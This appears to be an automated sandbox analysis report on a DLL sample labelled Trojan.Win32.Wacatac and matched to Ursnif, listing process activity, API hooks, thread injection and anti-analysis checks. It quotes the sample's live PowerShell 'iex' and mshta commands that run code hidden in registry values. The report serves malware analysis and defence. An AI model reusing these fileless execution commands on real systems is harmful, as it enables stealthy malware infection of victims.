Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation:

            Suspicious powershell command line found
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E2193 push ecx; ret 1_2_6D8E21A3
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E2140 push ecx; ret 1_2_6D8E2149
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8FD3F0 push ecx; mov dword ptr [esp], ecx 1_2_6D8FD3F1
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D954477 pushad ; retf 1_2_6D95451E

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY
            Hooks registry keys query functions (used to hide registry keys)
            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)
            Source: explorer.exe | IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C
            Modifies the import address table of user mode modules (user mode IAT hooks)
            Source: explorer.exe | EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe | User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2913
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6007
            Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe TID: 6596 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816 | Thread sleep time: -9223372036854770s >= -30000s
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW, 1_2_6D921B50
            Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWX
            Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: SpeechRuntime.exe, 00000015.00000003.407826903.00000255BD33C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW0
            Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
            Source: mshta.exe, 00000026.00000003.498767463.0000022639476000.00000004.00000001.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
            Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: SpeechRuntime.exe, 00000015.00000003.404478120.00000255BD348000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D91C480
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D925480 OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__cftoe,__aligned_msize,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__CrtDbgReportWV, 1_2_6D925480
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D9211D0 mov ecx, dword ptr fs:[00000030h] 1_2_6D9211D0
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D914880 mov eax, dword ptr fs:[00000030h] 1_2_6D914880
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D921310 mov ecx, dword ptr fs:[00000030h] 1_2_6D921310
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D9525FE mov eax, dword ptr fs:[00000030h] 1_2_6D9525FE
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D952534 mov eax, dword ptr fs:[00000030h] 1_2_6D952534
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D95213B push dword ptr fs:[00000030h] 1_2_6D95213B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D91C480
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D906930 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D906930
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D906AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6D906AA0

            HIPS / PFW / Operating System Protection Evasion:

            Compiles code for process injection (via .Net compiler)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File written: C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.0.cs
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: AE131580
            Maps a DLL or memory area into another process
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3292
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp | Binary or memory string: uProgram Manager
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D906610 cpuid 1_2_6D906610
            Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 1_2_6D8E1B13
            Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E1000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_6D8E1000
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_6D8E166F
            Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected Ursnif

            Remote Access Functionality: